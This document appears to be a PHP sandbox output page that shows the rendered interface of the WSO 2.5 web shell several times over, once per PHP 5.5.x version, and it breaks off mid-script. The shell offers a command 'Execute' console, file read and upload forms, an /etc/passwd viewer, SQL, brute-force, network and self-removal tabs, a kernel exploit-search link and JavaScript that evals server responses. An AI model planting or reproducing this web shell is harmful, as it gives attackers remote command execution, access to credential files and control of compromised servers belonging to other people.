</style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.26 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.25
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.25 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.24
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.24 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.23
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.23 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.22
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if 